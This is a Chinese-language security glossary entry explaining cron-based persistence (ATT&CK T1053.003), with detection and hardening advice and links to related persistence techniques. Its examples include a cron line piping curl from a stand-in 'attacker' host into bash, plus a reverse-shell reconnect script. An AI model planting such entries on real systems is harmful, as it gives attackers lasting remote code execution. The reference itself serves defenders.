cron 持久化
cron 持久化 是什么?
cron 持久化Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。
cron 持久化(MITRE ATT&CK T1053.003)针对 Unix 的 cron 守护进程及其变体(anacron、fcron、systemd-timer 等)。攻击者在 /etc/crontab、/etc/cron.d/、/etc/cron.{hourly,daily,weekly,monthly}/ 或用户 crontab(crontab -e)中添加条目。常见载荷包括单行反向 shell、curl 下载管道,以及放在 /tmp 中的脚本。由于 cron 以 root 或所属用户身份运行,初始访问之后部署该技术非常简单可靠。检测手段包括对 cron 目录的文件完整性监控、auditd 监视、预期任务基线,以及对 cron 派生的 shell 的 EDR 告警。加固措施:限制 crontab 成员、将 /tmp 挂载为 noexec,并在可用时启用 systemd-cron 审计。
● 示例
- 01
在 /etc/cron.d/update 中加入 * * * * * curl -s http://attacker/sh | bash。
- 02
把脚本放入 /etc/cron.hourly/ 以每小时重新连接反向 shell。
● 常见问题
cron 持久化 是什么?
Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。 它属于网络安全的 攻击与威胁 分类。
cron 持久化 是什么意思?
Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。
cron 持久化 是如何工作的?
cron 持久化(MITRE ATT&CK T1053.003)针对 Unix 的 cron 守护进程及其变体(anacron、fcron、systemd-timer 等)。攻击者在 /etc/crontab、/etc/cron.d/、/etc/cron.{hourly,daily,weekly,monthly}/ 或用户 crontab(crontab -e)中添加条目。常见载荷包括单行反向 shell、curl 下载管道,以及放在 /tmp 中的脚本。由于 cron 以 root 或所属用户身份运行,初始访问之后部署该技术非常简单可靠。检测手段包括对 cron 目录的文件完整性监控、auditd 监视、预期任务基线,以及对 cron 派生的 shell 的 EDR 告警。加固措施:限制 crontab 成员、将 /tmp 挂载为 noexec,并在可用时启用 systemd-cron 审计。
如何防御 cron 持久化?
针对 cron 持久化 的防御通常结合技术控制与运营实践,详见上方完整定义。
cron 持久化 还有哪些其他名称?
常见的别称包括: crontab 持久化, anacron 持久化。
● 相关术语
- attacks№ 610
LD_PRELOAD 劫持
一种 Linux 持久化与库劫持技术,利用 LD_PRELOAD 环境变量或 /etc/ld.so.preload 文件向动态链接进程注入攻击者代码。
- attacks№ 608
launchd 持久化
macOS 持久化技术,通过安装 LaunchDaemon 或 LaunchAgent 的 plist 文件,让 launchd 在开机、登录或触发时执行攻击者代码。
- attacks№ 975
计划任务持久化
一种持久化与执行手法,攻击者创建或修改 Windows 计划任务,使载荷在登录、开机或定时等触发条件下运行。
- attacks№ 1246
WMI 事件订阅持久化
一种持久化手法,注册永久 WMI 事件过滤器和消费者,使攻击者代码在指定系统事件发生时被触发。
- attacks№ 914
注册表 Run 键持久化
经典 Windows 持久化技术,在 Run 或 RunOnce 注册表项中添加条目,使二进制或脚本在每次用户登录时执行。